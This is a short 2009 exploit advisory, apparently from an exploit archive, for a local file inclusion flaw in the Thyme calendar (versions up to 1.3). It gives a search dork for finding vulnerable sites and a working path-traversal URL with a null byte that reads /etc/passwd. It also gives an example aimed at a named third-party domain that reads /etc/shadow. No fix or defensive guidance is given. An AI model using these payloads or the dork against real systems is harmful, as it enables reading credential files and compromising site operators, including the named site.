Thyme <= 1.3 (export_to) Local File Inclusion Vulnerability

2009-02-10 17:32:58

[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Theme Local File Inclusion / (Register_globals: off) |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Version: <= 1.3 |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Dork: Thyme 1. © 2006 eXtrovert Software LLC. All rights reserved |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Founded by: cheverok[at]gmail.com |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]

--------------------------------------------------------------------------------------
Intro:

See info

http://host/patch/phpinfo.php


if register_globals Off, then

---------------------------------------------------------------------------------------
Exploit:

http://host/patch/modules/sync/export.php?export_to=../../../../../../../../../../../etc/passwd%00


---------------------------------------------------------------------------------------
Example:


http://www.cbpool.org/thyme/modules/sync/export.php?export_to=../../../../../../../../../../../etc/shadow%00

----------------------------------------------------------------------------------------
(c) cheverok, 10.2.2009 greetz to antichat

#

Fixes

No fixes

In order to submit a new fix you need to be registered.